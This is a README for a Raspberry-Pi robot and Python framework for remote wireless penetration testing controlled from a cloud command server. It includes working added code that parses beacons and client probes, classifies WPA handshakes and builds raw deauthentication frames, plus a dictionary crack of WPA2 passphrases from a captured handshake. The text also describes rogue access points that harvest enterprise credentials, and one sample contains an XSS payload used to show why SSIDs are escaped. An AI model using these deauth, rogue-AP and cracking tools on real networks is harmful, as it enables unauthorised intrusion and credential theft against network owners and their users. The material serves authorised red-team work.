Spy-Bot

Spy-Bot: A Cloud Penetration Testing Approach for Wireless Penetration Testing.

Spy-Bot: A Cloud Pentesting Approach

Sit back in your room and pentest wireless networks anywhere in the world over cloud!

The Spy-Bot is a Raspberry-Pi based robot, built using Python, that can navigate and perform wireless penetration testing over the cloud. The Spy-Bot works with the Spy-Bot framework, which constitutes the source code and files needed to perform wireless penetration testing objectives using Python scripts.

The Spy-Bot framework provides a convenient approach to red-team exercises that penetration test the wireless networks in a particular region. The framework contains remote admin scripts used by a remote admin (Admin Workspace) and Spy-Bot scripts used on the Raspberry-Pi (SpyBot Workspace) to perform remote wireless penetration testing over the cloud.

The Spy-Bot framework contains tools designed to gather geographical information about wireless access points, detect Wi-Fi signal leakage by plotting on Google Maps the geo-coordinates at which a wireless AP's packets were received, and perform several other attack objectives. The framework sets up a database which stores the information collected during the wireless pentests and audits performed with the Spy-Bot.

This wireless pentest framework is designed specifically to work efficiently with a Raspberry-Pi. The source files for performing wireless penetration testing objectives (present in the SpyBot Workspace) can also be used on a standalone system running Kali Linux or a similar distro. The source code has been designed and tested to work with a TP-Link WN722N (use SpyBotMain.py in the master branch) and ALFA cards (check SpyBotMain_alfa.py to work with ALFA and other cards).

OBJECTIVES OF THE SPY-BOT:

1. Deploying the Spy-Bot:

2. Testing Attacks against WPA/WPA2/WPA-Enterprise Networks (objectives done using SpyBotMain.py and SpyBotMain_alfa.py)

3. Testing Attacks against WEP Networks

4. Testing Attacks against Authentication Protocols

5. Dynamically Hosting Rogue APs for victim clients

Using Python and hostapd to:

NEW FEATURES WILL BE ADDED SOON :) !

INSTALLATION

1. Setting up the CLOUD System / Command & Control Center (C2C)

2. Setting up the Spy-Bot

USE A SUITABLE DATABASE VIEWER (SUCH AS THE SQLITE MANAGER FIREFOX PLUGIN) TO VIEW THE CONTENTS OF THE SPYBOT.DB DATABASE. SAMPLE FILES ARE PROVIDED.

REFER TO THE WIKI PAGE FOR MORE DETAILS ON SETTING UP.

Usage

  1. SpyBotMain.py is responsible for performing the wireless pentest objectives. It can be run on a remote command and control center, or on the Spy-Bot. Make SpyBotMain.py executable and run it with root privileges, passing the name of the wireless interface to use:
chmod a+x SpyBotMain.py
./SpyBotMain.py <wireless-interface name>

example: ./SpyBotMain.py wlan0

  2. Run admin.py (as root) if performing objectives remotely.
chmod a+x admin.py
./admin.py

  3. Run navigation.py to control the motors of the Spy-Bot. Use the 'w', 'a', 's' and 'd' keys to control direction. Press the space key to stop.
chmod a+x navigation.py
./navigation.py

Screenshots

1. Connecting to the SpyBot.

On the cloud/C2C system, execute the admin.py script (as root, via sudo) present in the admin_workspace directory. admin.py lets you connect to the Spy-Bot over Yaler, launch GPU password attacks on pcap files, and retrieve any handshake files, rogue AP login detail files, etc. captured by the Spy-Bot, storing them in admin_workspace. NOTE: root@localhost is the default remote login prompt presented by the Yaler service once it is configured properly for the remote connection.

2. Running the spybotmain.py

Once you have logged in to the Spy-Bot using admin.py on the cloud server/remote control system, launch SpyBotMain.py from the spybot_workspace directory. SpyBotMain.py runs on the Raspberry-Pi (Spy-Bot) and performs the wireless penetration testing objectives.

3. Controlling the SpyBot remotely & war-driving over cloud

Launch navigation.py from spybot_workspace on the Spy-Bot to control and navigate it. Configure VNC camera access if needed (check Yaler.net for further details). Terminal 1 shows admin.py on the C2C system. Terminal 2 shows the output of navigation.py (in spybot_workspace on the remote RPi) controlling the motors of the remote Spy-Bot. Terminal 3 shows the output of SpyBotMain.py when a network scan is initiated: a list of available wireless networks, their channel numbers, etc. The 'coordinates' field shows the last location at which an access point was detected. The 'location' field describes those coordinates using Google APIs. All the information collected about the networks is stored in the spybot.db database on the Spy-Bot, which can be retrieved at the end of a wireless recon operation.

4. Mapping access points last seen locations on a map

The last-seen coordinates of the access points are mapped onto a Google Maps template and stored as an HTML file. Hover the cursor over the blue points to show the access point's name, signal strength and encryption type.
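The storage and mapping steps above, as an added example written for this page (it is not Spy-Bot's own code, and the table layout, column names and the map page skeleton are assumptions; the project's real spybot.db schema lives in its repo). It keeps one row per BSSID whose position follows the newest sighting while best_signal keeps the strongest reading, then emits the marker list as an HTML page. The one point worth taking away: an SSID is attacker-controlled input (anyone can beacon one), so it is HTML-escaped before it lands in the map file, otherwise a beacon such as `<img src=x onerror=alert(1)>` would execute when the admin opens the map. The upsert syntax needs SQLite 3.24 or later, which any Python 3.8+ build ships.

```python
"""Store wardriving results in a spybot.db-style SQLite file and render the
last-seen position of every access point into a self-contained HTML map page.
Added example for this page, not Spy-Bot's own code; the table layout and the
map page skeleton are assumptions."""
import html
import json
import sqlite3

SCHEMA = """CREATE TABLE IF NOT EXISTS networks (
    bssid TEXT PRIMARY KEY, ssid TEXT, channel INTEGER, encryption TEXT,
    best_signal INTEGER, last_lat REAL, last_lon REAL, last_seen TEXT)"""


def open_db(path=":memory:"):
    con = sqlite3.connect(path)
    con.execute(SCHEMA)
    return con


def record_sighting(con, bssid, ssid, channel, encryption, signal, lat, lon, seen_at):
    """Upsert one observation: position/time follow the newest sighting,
    best_signal keeps the strongest reading ever taken (SQLite >= 3.24)."""
    con.execute(
        """INSERT INTO networks VALUES (?, ?, ?, ?, ?, ?, ?, ?)
           ON CONFLICT(bssid) DO UPDATE SET
               ssid = excluded.ssid, channel = excluded.channel,
               encryption = excluded.encryption,
               best_signal = MAX(best_signal, excluded.best_signal),
               last_lat = excluded.last_lat, last_lon = excluded.last_lon,
               last_seen = excluded.last_seen""",
        (bssid, ssid, channel, encryption, signal, lat, lon, seen_at))
    con.commit()


def map_markers(con):
    """Rows with a position, ready for the map.  SSIDs are attacker-controlled
    input (anyone can beacon one), so escape them before they reach the HTML."""
    rows = con.execute("SELECT bssid, ssid, encryption, best_signal, last_lat, last_lon "
                       "FROM networks WHERE last_lat IS NOT NULL ORDER BY bssid").fetchall()
    return [{"bssid": bssid, "title": html.escape(f"{ssid} ({enc}, {sig} dBm)"),
             "lat": lat, "lon": lon}
            for bssid, ssid, enc, sig, lat, lon in rows]


MAP_TEMPLATE = """<!doctype html>
<html><head><meta charset="utf-8"><title>AP last-seen map</title></head>
<body><div id="map"></div>
<script>var APS = {markers};</script>
<script>/* plot APS with the map provider of your choice */</script>
</body></html>"""


def render_map(con):
    """Embed the marker list as JSON; '</' is broken up so no field can close the script tag."""
    markers = json.dumps(map_markers(con)).replace("</", "<\\/")
    return MAP_TEMPLATE.format(markers=markers)


def build_sample_db():
    """Constructed sightings (not real data); the second SSID is a deliberate HTML payload."""
    con = open_db()
    record_sighting(con, "02:01:02:03:04:a5", "CorpNet", 6, "WPA2", -71, 51.5007, -0.1246, "2017-05-01T10:00:00")
    record_sighting(con, "02:01:02:03:04:a5", "CorpNet", 6, "WPA2", -58, 51.5010, -0.1250, "2017-05-01T10:02:00")
    record_sighting(con, "02:01:02:03:04:a5", "CorpNet", 6, "WPA2", -80, 51.5012, -0.1260, "2017-05-01T10:05:00")
    record_sighting(con, "02:aa:bb:cc:dd:ee", "<img src=x onerror=alert(1)>", 11, "OPEN", -65, 51.5020, -0.1200, "2017-05-01T10:06:00")
    return con


if __name__ == "__main__":
    con = build_sample_db()
    with open("ap_map.html", "w", encoding="utf-8") as fh:
        fh.write(render_map(con))
    print(json.dumps(map_markers(con), indent=2))
```

Run it directly to write ap_map.html from the constructed sightings; swap `build_sample_db()` for `open_db("spybot.db")` to point it at a real capture database with the same columns.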

5. Scanning for client probes

Launch the client probe scanner from SpyBotMain.py to discover the access points that network devices in the region are searching for. When a device wants to connect to a saved wireless network, it sends out probe requests naming the networks it knows. This information can be used to set up rogue access points matching those names.
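What the network scan and the probe scanner above are actually reading off the air, as an added example written for this page (not Spy-Bot's code, which drives the card through airmon/scapy-style tooling): a small parser for raw 802.11 beacon and probe-request frames that records each network's BSSID, SSID, channel and encryption type, and each client's probed SSIDs. Frames are assumed to arrive with the radiotap header already removed; the sample frames at the bottom are constructed, not captured. Two details a practitioner wants right: a zero-length SSID element in a probe request is a wildcard probe and names no network, and a truncated tagged element is dropped rather than parsed past its end.

```python
"""Parse raw 802.11 beacon and probe-request frames and collect what a wireless
recon pass records: networks (BSSID, SSID, channel, encryption) and the SSIDs
each client probes for.  Added example for this page, not Spy-Bot's own code;
frames are assumed to arrive without a radiotap header."""
import struct

SUBTYPE_PROBE_REQ = 0x4
SUBTYPE_BEACON = 0x8
WPA_OUI_TYPE = bytes.fromhex("0050f201")       # vendor-specific IE carrying WPA (v1)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_tags(buf):
    """Yield (element_id, payload) from a tagged-parameter list; stop on truncation."""
    i = 0
    while i + 2 <= len(buf):
        eid, length = buf[i], buf[i + 1]
        body = buf[i + 2:i + 2 + length]
        if len(body) < length:                      # truncated element: do not trust it
            return
        yield eid, body
        i += 2 + length


def parse_mgmt(frame):
    """Describe a beacon or probe request; return None for anything else."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0:                                  # not a management frame
        return None
    src, bssid = mac_str(frame[10:16]), mac_str(frame[16:22])
    if subtype == SUBTYPE_PROBE_REQ:
        ssid = ""
        for eid, val in parse_tags(frame[24:]):
            if eid == 0:
                ssid = val.decode("utf-8", "replace")   # "" is a wildcard probe
        return {"kind": "probe", "client": src, "ssid": ssid}
    if subtype == SUBTYPE_BEACON and len(frame) >= 36:
        capab = struct.unpack_from("<H", frame, 34)[0]  # after timestamp(8) + interval(2)
        net = {"kind": "beacon", "bssid": bssid, "ssid": "", "channel": None,
               "encryption": "WEP" if capab & 0x0010 else "OPEN"}  # Privacy bit
        for eid, val in parse_tags(frame[36:]):
            if eid == 0:
                net["ssid"] = val.decode("utf-8", "replace")
            elif eid == 3 and len(val) == 1:            # DS Parameter Set
                net["channel"] = val[0]
            elif eid == 48:                             # RSN IE -> WPA2
                net["encryption"] = "WPA2"
            elif eid == 221 and val[:4] == WPA_OUI_TYPE and net["encryption"] != "WPA2":
                net["encryption"] = "WPA"
        return net
    return None


def recon(frames):
    """Return ({bssid: network}, {client_mac: {ssids}}) from an iterable of raw frames."""
    networks, probes = {}, {}
    for frame in frames:
        info = parse_mgmt(frame)
        if info is None:
            continue
        if info["kind"] == "beacon":
            networks[info["bssid"]] = info
        elif info["ssid"]:                              # wildcard probes name no network
            probes.setdefault(info["client"], set()).add(info["ssid"])
    return networks, probes


# --- constructed sample capture (not real traffic) ---------------------------
def _mgmt_header(subtype, src, dst, bssid):
    return struct.pack("<BBH", subtype << 4, 0, 0) + dst + src + bssid + b"\x00\x00"


def _tag(eid, body):
    return bytes([eid, len(body)]) + body


AP = bytes.fromhex("0201020304a5")
CLIENT = bytes.fromhex("0e1112131415")
BCAST = b"\xff" * 6
RSN_IE = bytes.fromhex("0100000fac040100000fac040100000fac020000")   # CCMP / PSK

SAMPLE_FRAMES = [
    _mgmt_header(SUBTYPE_BEACON, AP, BCAST, AP) + b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)
    + _tag(0, b"CorpNet") + _tag(3, b"\x06") + _tag(48, RSN_IE),
    _mgmt_header(SUBTYPE_PROBE_REQ, CLIENT, BCAST, BCAST) + _tag(0, b"HomeWiFi") + _tag(1, b"\x82\x84"),
    _mgmt_header(SUBTYPE_PROBE_REQ, CLIENT, BCAST, BCAST) + _tag(0, b""),      # wildcard probe
]

if __name__ == "__main__":
    nets, probes = recon(SAMPLE_FRAMES)
    for bssid, n in nets.items():
        print(f"{bssid}  {n['ssid']:<16} ch {n['channel']}  {n['encryption']}")
    for client, ssids in probes.items():
        print(f"{client} probes for {sorted(ssids)}")
```

Feed `recon()` the frames from a monitor-mode socket or a pcap reader of your choice; the `probes` map is exactly the list a rogue AP launcher wants to impersonate.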

6. Rogue access points and obtaining challenge-response pairs for WPA2-Enterprise networks

Launch the rogue AP launcher from SpyBotMain.py to create rogue access points, then wait for victims to connect and enter their credentials. This works against clients of WPA-Enterprise networks that authenticate without validating the server certificate: such a client completes the inner EAP exchange with the rogue AP and hands over its challenge-response pair. Launch the asleap functions from admin.py AFTER retrieving the captured files from the remote Spy-Bot onto the C2C/cloud server.

7. Deauth selective/all clients and force a WPA handshake

Launch the WPA handshake capture from SpyBotMain.py to sniff for EAPOL messages.

Launch the deauth launcher from SpyBotMain.py to deauthenticate all clients, or select multiple clients to deauthenticate. A deauthenticated client reconnects and repeats the WPA 4-way handshake, which the handshake capture records.
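The two steps above (sniff EAPOL, deauth to force a fresh handshake), as an added example written for this page rather than Spy-Bot's own code. It classifies captured EAPOL-Key payloads into handshake messages M1 to M4 from their Key Information flags, reports whether a crackable set has been captured (the ANonce from M1 or M3 plus the client's MIC'd M2), and builds the raw deauthentication frames an injector sends in both directions. EAPOL payloads are assumed to have their 802.11/LLC headers already stripped, and the capture at the bottom is constructed, not real. Note the M2/M4 ambiguity: both have MIC set and ACK clear; WPA2 marks M4 with the Secure bit, WPA (v1) does not, so the empty key-data field is used as the fallback tell.

```python
"""Classify captured EAPOL-Key frames into 4-way-handshake messages M1..M4,
decide whether a crackable handshake has been captured, and build the raw
deauthentication frames used to force a client to reconnect.  Added example
for this page, not Spy-Bot's own code; EAPOL payloads are assumed to be
already stripped of their 802.11/LLC headers."""
import struct

KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200


def eapol_key_fields(eapol):
    """Return (key_info, key_data_len) for an EAPOL-Key frame, else None."""
    if len(eapol) < 99 or eapol[1] != 3:             # EAPOL packet type 3 = EAPOL-Key
        return None
    if eapol[4] not in (2, 254):                      # descriptor: 2 = RSN (WPA2), 254 = WPA
        return None
    key_info = struct.unpack_from(">H", eapol, 5)[0]
    key_data_len = struct.unpack_from(">H", eapol, 97)[0]
    return key_info, key_data_len


def handshake_message(eapol):
    """Map Key Information flags to handshake message number 1-4 (None if unknown)."""
    fields = eapol_key_fields(eapol)
    if fields is None:
        return None
    key_info, key_data_len = fields
    if not key_info & KI_PAIRWISE:                    # group-key handshake, not interesting
        return None
    ack, mic, install, secure = (bool(key_info & f) for f in (KI_ACK, KI_MIC, KI_INSTALL, KI_SECURE))
    if ack and not mic:
        return 1                                      # AP -> STA, carries ANonce
    if ack and mic and install:
        return 3                                      # AP -> STA, carries ANonce + GTK
    if mic and not ack:
        # WPA2 sets Secure on M4; WPA(1) does not, so fall back to empty key data
        return 4 if (secure or key_data_len == 0) else 2
    return None


def handshake_status(captured):
    """captured: iterable of (bssid, client, eapol_bytes).
    Returns {(bssid, client): (sorted message numbers, crackable)}.  A PSK attack
    needs the ANonce (M1 or M3) plus the client's MIC'd M2 (SNonce + MIC)."""
    seen = {}
    for bssid, client, eapol in captured:
        msg = handshake_message(eapol)
        if msg:
            seen.setdefault((bssid, client), set()).add(msg)
    return {pair: (sorted(msgs), (1 in msgs or 3 in msgs) and 2 in msgs)
            for pair, msgs in seen.items()}


def deauth_frames(bssid, client, reason=7):
    """Raw 802.11 deauthentication frames in both directions (AP->client, client->AP);
    reason 7 = class 3 frame received from nonassociated STA, as aireplay-ng sends."""
    def frame(dst, src):
        return (struct.pack("<BBH", 0xC0, 0, 0x013A) + dst + src + bssid
                + b"\x00\x00" + struct.pack("<H", reason))
    return frame(client, bssid), frame(bssid, client)


# --- constructed sample capture (not real traffic) ---------------------------
def _eapol_key(key_info, key_data=b""):
    """Minimal EAPOL-Key frame: RSN descriptor, zeroed counters/nonce/MIC, given key data."""
    body = (bytes([2]) + struct.pack(">HH", key_info, 16) + b"\x00" * 88
            + struct.pack(">H", len(key_data)) + key_data)
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body


AP = bytes.fromhex("0201020304a5")
STA = bytes.fromhex("0e1112131415")
SAMPLE_CAPTURE = [
    (AP, STA, _eapol_key(KI_PAIRWISE | KI_ACK)),                                                  # M1
    (AP, STA, _eapol_key(KI_PAIRWISE | KI_MIC, key_data=b"\x30\x14" + b"\x00" * 20)),            # M2 + RSN IE
    (AP, STA, _eapol_key(KI_PAIRWISE | KI_ACK | KI_MIC | KI_INSTALL | KI_SECURE, b"\x00" * 24)),  # M3
    (AP, STA, _eapol_key(KI_PAIRWISE | KI_MIC | KI_SECURE)),                                      # M4
]

if __name__ == "__main__":
    for (bssid, client), (msgs, ok) in handshake_status(SAMPLE_CAPTURE).items():
        print(bssid.hex(":"), client.hex(":"), msgs, "crackable" if ok else "incomplete")
    to_client, to_ap = deauth_frames(AP, STA)
    print(to_client.hex(), to_ap.hex())
```

Run `handshake_status()` over what the sniffer has collected before stopping a capture; if a pair only shows `[1]` or `[1, 3]`, the client side was missed and a deauth round is worth repeating.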

8. Transfer captured handshakes, mapped APs, spybot.db to the C2C server

Prepare the files to send from SpyBotMain.py, then retrieve them with admin.py. View the contents of the spybot.db database with a suitable database viewer (such as the SQLite Manager Firefox plugin).

Networks and client probes found & collected during the recon by the spybot are stored in the spybot.db database.

9. GPU crack the handshake using pyrit

Launch the GPU password attack from admin.py on the cloud server after retrieving the sniffed handshakes from the Spy-Bot.

Similar operations for cracking WEP networks are also provided by the framework.
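What the GPU password attack on a captured handshake is computing, as an added example written for this page in pure Python (it is neither Spy-Bot's nor pyrit's code, and only illustrates the check pyrit runs on the GPU at scale): derive the PMK from each candidate passphrase with PBKDF2-HMAC-SHA1, expand it to the PTK with the two MACs and two nonces taken from the handshake, and compare the MIC recomputed with the KCK against the MIC carried in message 2. The handshake below is constructed from the passphrase "password" and SSID "IEEE", which is the 802.11i Annex test vector for the PMK, so the result is checkable; the MACs and nonces are arbitrary constants.

```python
"""What a PSK "GPU crack" actually computes, in pure Python: derive the PMK
from each candidate passphrase, expand it to the PTK for the captured
nonces/MACs, and check the MIC on message 2 of the handshake.  Added example
for this page, not Spy-Bot's or pyrit's code; the handshake below is
constructed from a known passphrase so the check has something to verify."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits (the slow step pyrit offloads to the GPU)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-512 'Pairwise key expansion' (802.11i); the first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (HMAC-SHA1-128): MIC over the frame with its MIC field (bytes 81..96) zeroed."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_m2, wordlist):
    """Return the passphrase whose derived KCK reproduces the MIC in M2, or None."""
    captured_mic = eapol_m2[81:97]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return candidate
    return None


# --- constructed handshake (not real traffic) --------------------------------
SSID = "IEEE"                        # with passphrase "password" this is the 802.11i Annex PMK test vector
AA = bytes.fromhex("0201020304a5")   # AP MAC (arbitrary)
SPA = bytes.fromhex("0e1112131415")  # client MAC (arbitrary)
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def build_m2(snonce, kck, key_data=RSN_IE):
    """EAPOL-Key message 2: key info 0x010A (MIC | Pairwise | descriptor version 2), replay counter 1."""
    body = (bytes([2]) + struct.pack(">HH", 0x010A, 16) + struct.pack(">Q", 1) + snonce
            + b"\x00" * 32 + b"\x00" * 16 + struct.pack(">H", len(key_data)) + key_data)
    frame = bytes([1, 3]) + struct.pack(">H", len(body)) + body
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


def sample_m2(passphrase="password"):
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_m2(SNONCE, kck)


if __name__ == "__main__":
    m2 = sample_m2()
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, m2, ["letmein", "Password1", "password"]))
```

On a real capture the MACs, nonces and the M2 frame come from the pcap (AA/ANonce from M1 or M3, SPA/SNonce/MIC from M2); everything else is the same, which is why PMK precomputation per SSID (what pyrit batches) is the only part worth a GPU.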

Links

  1. Yaler Services & setting up yaler for remote access : https://www.yaler.net/
  2. Setting up optirun, nvidia & pyrit setup on Kali Linux: https://www.pcsuggest.com/install-latest-pyrit-0-4-with-cuda-in-kali-linux-debian/
  3. Setting up asleap: https://github.com/joswr1ght/asleap
  4. Setting up hostapd: https://w1.fi/hostapd/ (copy hostapd executable in the proper hostapd directory)

LICENSE

MIT License

Copyright (c) 2017 Aamer Shareef

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.